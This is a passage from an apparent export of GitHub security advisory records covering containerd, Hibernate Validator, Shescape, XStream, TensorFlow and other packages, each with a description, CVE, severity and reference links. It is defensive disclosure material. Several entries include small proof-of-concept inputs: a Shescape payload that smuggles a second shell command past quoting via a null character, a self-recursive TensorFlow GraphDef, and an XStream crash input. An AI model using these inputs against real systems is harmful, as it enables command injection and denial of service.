Containers launched through containerd’s CRI implementation on Linux systems which use the SELinux security module and containerd versions since v1.5.0 can cause arbitrary files and directories on the host to be relabeled to match the container process label through the use of specially-configured bind mounts in a hostPath volume. This relabeling elevates permissions for the container, granting full read/write access over the affected files and directories. Kubernetes and crictl can both be configured to use containerd’s CRI implementation.
If you are not using containerd’s CRI implementation (through one of the mechanisms described above), you are not affected by this issue.
### Patches
This bug has been fixed in containerd 1.5.9. Because file labels persist independently of containerd, users should both update to these versions as soon as they are released and validate that all files on their host are correctly labeled.
### Workarounds
Ensure that no sensitive files or directories are used as a hostPath volume source location. Policy enforcement mechanisms such a Kubernetes Pod Security Policy [AllowedHostPaths](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems) may be specified to limit the files and directories that can be bind-mounted to containers.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose)
* Email us at [security@containerd.io](mailto:security@containerd.io) | {'CVE-2021-43816'} | 2022-02-16T22:03:34Z | 2022-01-06T17:36:59Z | HIGH | 8 | {'CWE-281'} | {'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GD5GH7NMK5VJMA2Y5CYB5O5GTPYMWMLX/', 'https://github.com/containerd/containerd/security/advisories/GHSA-mvff-h3cj-wj9c', 'https://github.com/containerd/containerd/commit/a731039238c62be081eb8c31525b988415745eea', 'https://github.com/advisories/GHSA-mvff-h3cj-wj9c', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43816', 'https://github.com/dweomer/containerd/commit/f7f08f0e34fb97392b0d382e58916d6865100299', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MPDIZMI7ZPERSZE2XO265UCK5IWM7CID/', 'https://github.com/containerd/containerd/issues/6194'} | null | {'https://github.com/containerd/containerd/commit/a731039238c62be081eb8c31525b988415745eea', 'https://github.com/dweomer/containerd/commit/f7f08f0e34fb97392b0d382e58916d6865100299'} | {'https://github.com/dweomer/containerd/commit/f7f08f0e34fb97392b0d382e58916d6865100299', 'https://github.com/containerd/containerd/commit/a731039238c62be081eb8c31525b988415745eea'} |
GHSA | GHSA-xxgp-pcfc-3vgc | Privilege Escalation in Hibernate Validator | In Hibernate Validator 5.2.x before 5.2.5 final, 5.3.x, and 5.4.x, it was found that when the security manager's reflective permissions, which allows it to access the private members of the class, are granted to Hibernate Validator, a potential privilege escalation can occur. By allowing the calling code to access those private members without the permission an attacker may be able to validate an invalid instance and access the private member value via ConstraintViolation#getInvalidValue(). | {'CVE-2017-7536'} | 2022-03-31T22:00:46Z | 2020-06-15T19:57:48Z | HIGH | 7 | {'CWE-470'} | {'https://github.com/hibernate/hibernate-validator/commit/0886e89900d343ea20fde5137c9a3086e6da9ac', 'https://access.redhat.com/errata/RHSA-2018:2742', 'https://access.redhat.com/errata/RHSA-2017:3456', 'https://access.redhat.com/errata/RHSA-2017:2810', 'https://access.redhat.com/errata/RHSA-2018:2741', 'https://access.redhat.com/errata/RHSA-2017:2809', 'https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2017-7536', 'https://github.com/advisories/GHSA-xxgp-pcfc-3vgc', 'https://access.redhat.com/errata/RHSA-2018:3817', 'https://access.redhat.com/errata/RHSA-2017:3455', 'https://access.redhat.com/errata/RHSA-2017:3141', 'https://bugzilla.redhat.com/show_bug.cgi?id=1465573', 'https://access.redhat.com/errata/RHSA-2017:2811', 'https://access.redhat.com/errata/RHSA-2018:2927', 'https://access.redhat.com/errata/RHSA-2017:2808', 'http://www.securityfocus.com/bid/101048', 'https://access.redhat.com/errata/RHSA-2017:3458', 'https://github.com/hibernate/hibernate-validator/commit/0778a5c98b817771a645c6f4ba0b28dd8b5437b', 'https://access.redhat.com/errata/RHSA-2018:2740', 'https://access.redhat.com/errata/RHSA-2018:2743', 'https://access.redhat.com/errata/RHSA-2017:3454', 'http://www.securitytracker.com/id/1039744'} | null | {'https://github.com/hibernate/hibernate-validator/commit/0886e89900d343ea20fde5137c9a3086e6da9ac', 'https://github.com/hibernate/hibernate-validator/commit/0778a5c98b817771a645c6f4ba0b28dd8b5437b'} | {'https://github.com/hibernate/hibernate-validator/commit/0778a5c98b817771a645c6f4ba0b28dd8b5437b', 'https://github.com/hibernate/hibernate-validator/commit/0886e89900d343ea20fde5137c9a3086e6da9ac'} |
GHSA | GHSA-qq74-vgcf-54c3 | Cross-site Scripting in ShowDoc | ShowDoc is vulnerable to stored cross-site scripting via viva cshtm file upload in in versions 2.10.3 and prior. A patch is available and anticipated to be part of version 2.10.4. | {'CVE-2022-0946'} | 2022-03-23T15:38:13Z | 2022-03-15T00:01:00Z | MODERATE | 5.4 | {'CWE-79'} | {'https://github.com/star7th/showdoc/commit/e5d575928b1371a7e07b09b6592822298335062a', 'https://huntr.dev/bounties/1f8f0021-396e-428e-9748-dd4e359715e1', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0946', 'https://github.com/advisories/GHSA-qq74-vgcf-54c3'} | null | {'https://github.com/star7th/showdoc/commit/e5d575928b1371a7e07b09b6592822298335062a'} | {'https://github.com/star7th/showdoc/commit/e5d575928b1371a7e07b09b6592822298335062a'} |
GHSA | GHSA-f2rp-38vg-j3gh | Null characters not escaped | ### Impact
Anyone using _Shescape_ to defend against shell injection may still be vulnerable against shell injection if the attacker manages to insert a [null character](https://en.wikipedia.org/wiki/Null_character) into the payload. For example (on Windows):
```javascript
const cp = require("child_process");
const shescape = require("shescape");
const nullChar = String.fromCharCode(0);
const payload = "foo\" && ls -al ${nullChar} && echo \"bar";
console.log(cp.execSync(`echo ${shescape.quote(payload)}`));
// foototal 3
// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:44 .
// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 00:09 ..
// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:42 folder
// -rw-r--r-- 1 owner XXXXXX 0 Mar 13 18:42 file
```
### Patches
The problem has been patched in [v1.1.3](https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3) which you can upgrade to now. No further changes are required.
### Workarounds
Alternatively, null characters can be stripped out manually using e.g. `arg.replace(/\u{0}/gu, "")` | {'CVE-2021-21384'} | 2021-03-22T14:18:23Z | 2021-03-18T23:47:56Z | HIGH | 6.3 | {'CWE-88'} | {'https://github.com/ericcornelissen/shescape/security/advisories/GHSA-f2rp-38vg-j3gh', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21384', 'https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3', 'https://github.com/advisories/GHSA-f2rp-38vg-j3gh', 'https://github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b', 'https://www.npmjs.com/package/shescape'} | null | {'https://github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b'} | {'https://github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b'} |
GHSA | GHSA-28mg-98xm-q493 | Open Redirect in archivy | archivy prior to version 1.7.1 is vulnerable to open redirect. | {'CVE-2022-0697'} | 2022-04-05T00:13:22Z | 2022-03-08T00:00:32Z | MODERATE | 6.1 | {'CWE-601'} | {'https://huntr.dev/bounties/2d0301a2-10ff-48f4-a346-5a0e8707835b', 'https://github.com/archivy/archivy/commit/2d8cb29853190d42572b36deb61127e68d6be574', 'https://github.com/pypa/advisory-database/tree/main/vulns/archivy/PYSEC-2022-161.yaml', 'https://github.com/advisories/GHSA-28mg-98xm-q493', 'https://github.com/archivy/archivy/releases/tag/v1.7.1', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0697'} | null | {'https://github.com/archivy/archivy/commit/2d8cb29853190d42572b36deb61127e68d6be574'} | {'https://github.com/archivy/archivy/commit/2d8cb29853190d42572b36deb61127e68d6be574'} |
GHSA | GHSA-h24f-9mm4-w336 | Cross-site Scripting (XSS) - Stored in crud-file-server | Versions of `crud-file-server` before 0.8.0 are vulnerable to stored cross-site scripting (XSS). This is due to insufficient santiziation of filenames when directory index is served by `crud-file-server`.
## Recommendation
Update to version 0.8.0 or later. | {'CVE-2018-3726'} | 2021-01-08T18:44:58Z | 2018-07-18T18:34:27Z | CRITICAL | 0 | {'CWE-79'} | {'https://hackerone.com/reports/311101', 'https://www.npmjs.com/advisories/570', 'https://github.com/advisories/GHSA-h24f-9mm4-w336', 'https://github.com/omphalos/crud-file-server/commit/4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa', 'https://nvd.nist.gov/vuln/detail/CVE-2018-3726'} | null | {'https://github.com/omphalos/crud-file-server/commit/4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa'} | {'https://github.com/omphalos/crud-file-server/commit/4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa'} |
GHSA | GHSA-7hwc-46rm-65jh | Denial of service in XStream | XStream through 1.4.9, when a certain denyTypes workaround is not used, mishandles attempts to create an instance of the primitive type 'void' during unmarshalling, leading to a remote application crash, as demonstrated by an xstream.fromXML("<void/>") call. | {'CVE-2017-7957'} | 2021-09-22T18:46:26Z | 2020-06-30T22:48:24Z | HIGH | 7.5 | {'CWE-20'} | {'https://exchange.xforce.ibmcloud.com/vulnerabilities/125800', 'https://access.redhat.com/errata/RHSA-2017:2889', 'https://github.com/x-stream/xstream/commit/6e546ec366419158b1e393211be6d78ab9604ab', 'http://www.securitytracker.com/id/1039499', 'https://www-prd-trops.events.ibm.com/node/715749', 'https://github.com/x-stream/xstream/commit/b3570be2f39234e61f99f9a20640756ea71b1b4', 'https://github.com/advisories/GHSA-7hwc-46rm-65jh', 'https://access.redhat.com/errata/RHSA-2017:2888', 'http://x-stream.github.io/CVE-2017-7957.html', 'http://www.debian.org/security/2017/dsa-3841', 'https://access.redhat.com/errata/RHSA-2017:1832', 'https://nvd.nist.gov/vuln/detail/CVE-2017-7957', 'http://www.securityfocus.com/bid/100687', 'https://github.com/x-stream/xstream/commit/8542d02d9ac5d384c85f4b33d6c1888c53bd55d'} | null | {'https://github.com/x-stream/xstream/commit/b3570be2f39234e61f99f9a20640756ea71b1b4', 'https://github.com/x-stream/xstream/commit/8542d02d9ac5d384c85f4b33d6c1888c53bd55d', 'https://github.com/x-stream/xstream/commit/6e546ec366419158b1e393211be6d78ab9604ab'} | {'https://github.com/x-stream/xstream/commit/6e546ec366419158b1e393211be6d78ab9604ab', 'https://github.com/x-stream/xstream/commit/b3570be2f39234e61f99f9a20640756ea71b1b4', 'https://github.com/x-stream/xstream/commit/8542d02d9ac5d384c85f4b33d6c1888c53bd55d'} |
GHSA | GHSA-whv6-rj84-2vh2 | Cross-Site Scripting in nextcloud-vue-collections | Versions of `nextcloud-vue-collections` prior to 0.4.2 are vulnerable to Cross-Site Scripting (XSS). The `v-tooltip` component has an insecure `defaultHTML` configuration that allows arbitrary JavaScript to be injected in the tooltip of a collection item. This allows attackers to execute arbitrary code in a victim's browser.
## Recommendation
Upgrade to version 0.4.2 or later. | null | 2021-10-04T20:36:43Z | 2020-09-04T17:21:58Z | HIGH | 0 | {'CWE-79'} | {'https://github.com/advisories/GHSA-whv6-rj84-2vh2', 'https://github.com/juliushaertl/nextcloud-vue-collections/commit/8ec1fca214f003538cec4137792ede928f25f583', 'https://www.npmjs.com/advisories/1442'} | null | {'https://github.com/juliushaertl/nextcloud-vue-collections/commit/8ec1fca214f003538cec4137792ede928f25f583'} | {'https://github.com/juliushaertl/nextcloud-vue-collections/commit/8ec1fca214f003538cec4137792ede928f25f583'} |
GHSA | GHSA-247x-2f9f-5wp7 | Stack overflow in TensorFlow | ### Impact
The `GraphDef` format in TensorFlow does not allow self recursive functions. The runtime assumes that this invariant is satisfied. However, a `GraphDef` containing a fragment such as the following can be consumed when loading a `SavedModel`:
```
library {
function {
signature {
name: "SomeOp"
description: "Self recursive op"
}
node_def {
name: "1"
op: "SomeOp"
}
node_def {
name: "2"
op: "SomeOp"
}
}
}
```
This would result in a stack overflow during execution as resolving each `NodeDef` means resolving the function itself and its nodes.
### Patches
We have patched the issue in GitHub commit [448a16182065bd08a202d9057dd8ca541e67996c](https://github.com/tensorflow/tensorflow/commit/448a16182065bd08a202d9057dd8ca541e67996c).
The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. | {'CVE-2022-23591'} | 2022-02-11T20:00:23Z | 2022-02-09T23:30:01Z | HIGH | 7.5 | {'CWE-400'} | {'https://github.com/advisories/GHSA-247x-2f9f-5wp7', 'https://github.com/tensorflow/tensorflow/commit/448a16182065bd08a202d9057dd8ca541e67996c', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-247x-2f9f-5wp7', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23591'} | null | {'https://github.com/tensorflow/tensorflow/commit/448a16182065bd08a202d9057dd8ca541e67996c'} | {'https://github.com/tensorflow/tensorflow/commit/448a16182065bd08a202d9057dd8ca541e67996c'} |
GHSA | GHSA-2xw8-j43j-5vxp | elgg is vulnerable to Cross-site Scripting | elgg is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | {'CVE-2021-4072'} | 2022-01-06T21:35:42Z | 2022-01-06T21:35:42Z | MODERATE | 5.4 | {'CWE-79'} | {'https://github.com/elgg/elgg/commit/c30b17bf75256ed3fcc84e2083147cc3951423d0', 'https://nvd.nist.gov/vuln/detail/CVE-2021-4072', 'https://github.com/advisories/GHSA-2xw8-j43j-5vxp', 'https://huntr.dev/bounties/74034253-732a-4251-a0f9-eca5f576c955'} | null | {'https://github.com/elgg/elgg/commit/c30b17bf75256ed3fcc84e2083147cc3951423d0'} | {'https://github.com/elgg/elgg/commit/c30b17bf75256ed3fcc84e2083147cc3951423d0'} |
GHSA | GHSA-3xc7-xg67-pw99 | Sensitive Data Exposure in sequelize-cli | Versions of `sequelize-cli` prior to 5.5.0 are vulnerable to Sensitive Data Exposure. The function `filteredURL()` does not properly sanitize the `config.password` value which may cause passwords with special characters to be logged in plain text.
## Recommendation
Upgrade to version 5.5.0 or later. | null | 2021-08-04T20:54:46Z | 2019-06-05T20:43:10Z | LOW | 3.5 | {'CWE-532'} | {'https://github.com/advisories/GHSA-3xc7-xg67-pw99', 'https://github.com/sequelize/cli/pull/722', 'https://www.npmjs.com/advisories/825', 'https://github.com/sequelize/cli/issues/172', 'https://snyk.io/vuln/SNYK-JS-SEQUELIZECLI-174320', 'https://github.com/FelixLC/cli/commit/da59652c061a798282e18efad0b6d0afefa15465'} | null | {'https://github.com/FelixLC/cli/commit/da59652c061a798282e18efad0b6d0afefa15465'} | {'https://github.com/FelixLC/cli/commit/da59652c061a798282e18efad0b6d0afefa15465'} |
GHSA | GHSA-9cwv-cppx-mqjm | Improper Authentication in Capsule Proxy | ### Impact
Using a malicious `Connection` header, an attacker with a proper authentication mechanism could start a privilege escalation towards the Kubernetes API Server, being able to exploit the `cluster-admin` Role bound to `capsule-proxy`.
### Patches
Patch has been merged in the v0.2.1 release.
### Workarounds
Upgrading is mandatory.
| {'CVE-2022-23652'} | 2022-04-19T19:03:24Z | 2022-02-23T21:17:25Z | HIGH | 8.8 | {'CWE-287'} | {'https://github.com/clastix/capsule-proxy/security/advisories/GHSA-9cwv-cppx-mqjm', 'https://github.com/advisories/GHSA-9cwv-cppx-mqjm', 'https://github.com/clastix/capsule-proxy/commit/efe91f68ebf8a9e3d21491dc57da7b8a746415d8', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23652', 'https://github.com/clastix/capsule-proxy/issues/188'} | null | {'https://github.com/clastix/capsule-proxy/commit/efe91f68ebf8a9e3d21491dc57da7b8a746415d8'} | {'https://github.com/clastix/capsule-proxy/commit/efe91f68ebf8a9e3d21491dc57da7b8a746415d8'} |
GHSA | GHSA-399h-cmvp-qgx5 | Incorrect Default Permissions in Binance tss-lib | The keygen protocol implementation in Binance tss-lib before 1.2.0 allows attackers to generate crafted h1 and h2 parameters in order to compromise a signing round or obtain sensitive information from other parties. | {'CVE-2020-12118'} | 2021-06-29T21:32:11Z | 2021-06-29T21:32:11Z | HIGH | 7.2 | {'CWE-276'} | {'https://github.com/advisories/GHSA-399h-cmvp-qgx5', 'https://github.com/binance-chain/tss-lib/pull/89', 'https://nvd.nist.gov/vuln/detail/CVE-2020-12118', 'https://github.com/binance-chain/tss-lib/releases/tag/v1.2.0', 'https://github.com/binance-chain/tss-lib/pull/89/commits/7b7c17e90504d5dad94b938e84fec690bb1ec311'} | null | {'https://github.com/binance-chain/tss-lib/pull/89/commits/7b7c17e90504d5dad94b938e84fec690bb1ec311'} | {'https://github.com/binance-chain/tss-lib/pull/89/commits/7b7c17e90504d5dad94b938e84fec690bb1ec311'} |
GHSA | GHSA-jpwx-ffjq-wr4w | Content object state fetch functions open to SQL injection | ### Impact
This Security Update is about a vulnerability in eZ Publish Legacy. The content object state code could be vulnerable to SQL injection. There is no known exploit, but one might be possible. If you use Legacy in any way, we strongly recommend that you install this update as soon as possible.
### Patches
The fix is distributed via Composer, see "Patched versions".
| null | 2021-09-07T22:54:23Z | 2021-09-07T22:54:23Z | HIGH | 0 | {'CWE-89'} | {'https://github.com/ezsystems/ezpublish-legacy/commit/f8e3a97afd92efb9148134a4bacb35a875777a42', 'https://github.com/advisories/GHSA-jpwx-ffjq-wr4w', 'https://developers.ibexa.co/security-advisories/ibexa-sa-2021-005-content-object-state-fetch-functions-open-to-sql-injection', 'https://github.com/ezsystems/ezpublish-legacy/security/advisories/GHSA-jpwx-ffjq-wr4w'} | null | {'https://github.com/ezsystems/ezpublish-legacy/commit/f8e3a97afd92efb9148134a4bacb35a875777a42'} | {'https://github.com/ezsystems/ezpublish-legacy/commit/f8e3a97afd92efb9148134a4bacb35a875777a42'} |
GHSA | GHSA-6jmh-9gqm-5xrx | Cross-Site Request Forgery (CSRF) in livehelperchat | A CSRF issue is found in the audit configuration under settings. It was found that no CSRF token validation is getting done on the server-side. If we remove the CSRF token and keep the CSRF token field empty, the action is getting performed. | {'CVE-2022-0226'} | 2022-01-26T20:21:03Z | 2022-01-26T20:21:03Z | MODERATE | 4.3 | {'CWE-352'} | {'https://github.com/livehelperchat/livehelperchat/commit/f59ffb02984c0ce2fbb19ac39365066507de9370', 'https://huntr.dev/bounties/635d0abf-7680-47f6-a277-d9a91471c73f', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0226', 'https://github.com/advisories/GHSA-6jmh-9gqm-5xrx'} | null | {'https://github.com/livehelperchat/livehelperchat/commit/f59ffb02984c0ce2fbb19ac39365066507de9370'} | {'https://github.com/livehelperchat/livehelperchat/commit/f59ffb02984c0ce2fbb19ac39365066507de9370'} |
GHSA | GHSA-4f6x-49g2-99fm | Cross-site Scripting in Mermaid | Mermaid before 8.11.0 allows XSS when the antiscript feature is used. | {'CVE-2021-35513'} | 2021-12-10T18:57:41Z | 2021-12-10T18:57:41Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/advisories/GHSA-4f6x-49g2-99fm', 'https://github.com/mermaid-js/mermaid/pull/2123', 'https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e', 'https://github.com/mermaid-js/mermaid/issues/2122', 'https://nvd.nist.gov/vuln/detail/CVE-2021-35513', 'https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2'} | null | {'https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e'} | {'https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e'} |
GHSA | GHSA-jcw8-r9xm-32c6 | Command Injection in dns-sync | Affected versions of `dns-sync` have an arbitrary command execution vulnerability in the `resolve()` method.
## Recommendation
- Use an alternative dns resolver
- Do not allow untrusted input into `dns-sync.resolve()` | {'CVE-2017-16100'} | 2021-01-08T18:35:10Z | 2018-07-18T18:28:02Z | CRITICAL | 0 | {'CWE-94'} | {'https://nodesecurity.io/advisories/523', 'https://github.com/skoranga/node-dns-sync/issues/5', 'https://www.npmjs.com/advisories/523', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16100', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d', 'https://www.npmjs.com/advisories/153', 'https://github.com/skoranga/node-dns-sync/issues/1', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d)))', 'https://github.com/skoranga/node-dns-sync/issues/1)', 'https://github.com/advisories/GHSA-jcw8-r9xm-32c6'} | null | {'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d)))', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d'} | {'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d)))', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d'} |
GHSA | GHSA-7g7r-gr46-q4p5 | Cross-Site Request Forgery in yetiforce | Versions of yetiforce 6.3.0 and prior are subject to privilege escalation via a cross site request forgery bug. This allows an attacker to create a new admin account even with SameSite: Strict enabled. This vulnerability can be exploited by any user on the system including guest users. | {'CVE-2022-0269'} | 2022-01-31T21:47:29Z | 2022-01-27T16:21:33Z | HIGH | 8 | {'CWE-352'} | {'https://github.com/advisories/GHSA-7g7r-gr46-q4p5', 'https://github.com/yetiforcecompany/yetiforcecrm/commit/298c7870e6fe4332d8aa1757a9c8d79f841389ff', 'https://huntr.dev/bounties/a0470915-f6df-45b8-b3a2-01aebe764df0', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0269'} | null | {'https://github.com/yetiforcecompany/yetiforcecrm/commit/298c7870e6fe4332d8aa1757a9c8d79f841389ff'} | {'https://github.com/yetiforcecompany/yetiforcecrm/commit/298c7870e6fe4332d8aa1757a9c8d79f841389ff'} |
GHSA | GHSA-4r3m-j6x5-48m3 | Cross Site Scripting(XSS) Vulnerability in Latest Release 4.3.6 Site basic settings | baserCMS 4.3.6 and earlier is affected by Cross Site Scripting (XSS) via arbitrary script execution. Admin access is required to exploit this vulnerability. The affected components is toolbar.php. The issue is fixed in version 4.3.7. | {'CVE-2020-15155'} | 2022-04-19T19:02:32Z | 2020-08-28T21:20:42Z | LOW | 7.3 | {'CWE-79'} | {'https://basercms.net/security/20200827', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15155', 'https://github.com/baserproject/basercms/security/advisories/GHSA-4r3m-j6x5-48m3', 'https://github.com/advisories/GHSA-4r3m-j6x5-48m3', 'https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f'} | null | {'https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f'} | {'https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f'} |
GHSA | GHSA-c92m-rrrc-q5wf | High severity vulnerability that affects safemode | The Safemode gem before 1.2.4 for Ruby, when initialized with a delegate object that is a Rails controller, allows context-dependent attackers to obtain sensitive information via the inspect method. | {'CVE-2016-3693'} | 2021-09-08T21:49:15Z | 2017-10-24T18:33:35Z | HIGH | 8.1 | {'CWE-200'} | {'https://github.com/theforeman/foreman/commit/82f9b93c54f72c5814df6bab7fad057eab65b2f2', 'http://rubysec.com/advisories/CVE-2016-3693/', 'http://projects.theforeman.org/issues/14635', 'http://www.openwall.com/lists/oss-security/2016/04/20/8', 'http://theforeman.org/security.html#2016-3693', 'https://nvd.nist.gov/vuln/detail/CVE-2016-3693', 'https://github.com/advisories/GHSA-c92m-rrrc-q5wf', 'https://access.redhat.com/errata/RHSA-2018:0336', 'https://github.com/svenfuchs/safemode/commit/0f764a1720a3a68fd2842e21377c8bfad6d7126f'} | null | {'https://github.com/svenfuchs/safemode/commit/0f764a1720a3a68fd2842e21377c8bfad6d7126f', 'https://github.com/theforeman/foreman/commit/82f9b93c54f72c5814df6bab7fad057eab65b2f2'} | {'https://github.com/theforeman/foreman/commit/82f9b93c54f72c5814df6bab7fad057eab65b2f2', 'https://github.com/svenfuchs/safemode/commit/0f764a1720a3a68fd2842e21377c8bfad6d7126f'} |
GHSA | GHSA-v52p-hfjf-wg88 | Division by zero in TFLite's implementation of `SpaceToBatchNd` | ### Impact
The implementation of the `SpaceToBatchNd` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/412c7d9bb8f8a762c5b266c9e73bfa165f29aac8/tensorflow/lite/kernels/space_to_batch_nd.cc#L82-L83):
```cc
TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0);
output_size->data[dim + 1] = final_dim_size / block_shape[dim];
```
An attacker can craft a model such that one dimension of the `block` input is 0. Hence, the corresponding value in `block_shape` is 0.
### Patches
We have patched the issue in GitHub commit [6d36ba65577006affb272335b7c1abd829010708](https://github.com/tensorflow/tensorflow/commit/6d36ba65577006affb272335b7c1abd829010708).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360. | {'CVE-2021-29597'} | 2021-05-21T14:27:54Z | 2021-05-21T14:27:54Z | LOW | 2.5 | {'CWE-369'} | {'https://github.com/tensorflow/tensorflow/commit/6d36ba65577006affb272335b7c1abd829010708', 'https://github.com/advisories/GHSA-v52p-hfjf-wg88', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-v52p-hfjf-wg88', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29597'} | null | {'https://github.com/tensorflow/tensorflow/commit/6d36ba65577006affb272335b7c1abd829010708'} | {'https://github.com/tensorflow/tensorflow/commit/6d36ba65577006affb272335b7c1abd829010708'} |
GHSA | GHSA-r626-fc64-3q28 | Data race in abox | An issue was discovered in the abox crate before 0.4.1 for Rust.
Affected versions of this crate implements `Send`/`Sync` for `AtomicBox<T>` without requiring `T: Send`/`T: Sync`. This allows to create data races to `T: !Sync` and send `T: !Send` to another thread.
Such behavior breaks the compile-time thread safety guarantees of Rust, and allows users to incur undefined behavior using safe Rust (e.g. memory corruption from data race).
The flaw was corrected in commit 34c2b9e by adding trait bound `T: Send` to `Send` impl for `AtomicBox<T>` and trait bound `T: Sync` to `Sync` impl for `AtomicBox<T>`. | {'CVE-2020-36441'} | 2021-08-25T20:59:06Z | 2021-08-25T20:59:06Z | HIGH | 8.1 | {'CWE-119', 'CWE-362'} | {'https://github.com/SonicFrog/abox/commit/34c2b9e', 'https://rustsec.org/advisories/RUSTSEC-2020-0121.html', 'https://github.com/SonicFrog/abox/pull/2', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36441', 'https://github.com/SonicFrog/abox/issues/1', 'https://github.com/advisories/GHSA-r626-fc64-3q28'} | null | {'https://github.com/SonicFrog/abox/commit/34c2b9e'} | {'https://github.com/SonicFrog/abox/commit/34c2b9e'} |
GHSA | GHSA-hrpp-f84w-xhfg | Outdated Static Dependency in vue-moment | Versions of `vue-moment` prior to 4.1.0 contain an Outdated Static Dependency. The package depends on `moment` and has it loaded statically instead of as a dependency that can be updated. It has `moment@2.19.1` that contains a Regular Expression Denial of Service vulnerability.
## Recommendation
Upgrade to version 4.1.0 or later. | null | 2021-10-04T19:13:24Z | 2020-09-04T16:55:06Z | MODERATE | 5.3 | {'CWE-1104'} | {'https://www.npmjs.com/advisories/532', 'https://www.npmjs.com/advisories/1425', 'https://github.com/brockpetrie/vue-moment/commit/a265e54660a7181a6795a12a97cebac5b305746e', 'https://github.com/advisories/GHSA-hrpp-f84w-xhfg', 'https://snyk.io/vuln/SNYK-JS-VUEMOMENT-538934'} | null | {'https://github.com/brockpetrie/vue-moment/commit/a265e54660a7181a6795a12a97cebac5b305746e'} | {'https://github.com/brockpetrie/vue-moment/commit/a265e54660a7181a6795a12a97cebac5b305746e'} |
GHSA | GHSA-whrh-9j4q-g7ph | CSRF Vulnerability in polaris-website | ### Impact
CSRF vulnerability:
In some very specific circumstances, an attacker would be able to update your settings.
Basically you would need to navigate to hackersite.com while logged into our panel. Then they could modify your settings. They couldn't check if it worked, nor could they read your settings.
### Patches
As of v1.1.1 this has been patched by implementing the Double submit pattern using a cookie.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Polaris-React](https://github.com/polaris-rbx/polaris-react)
* Email us at [hi@nezto.re](mailto:hi@nezto.re)
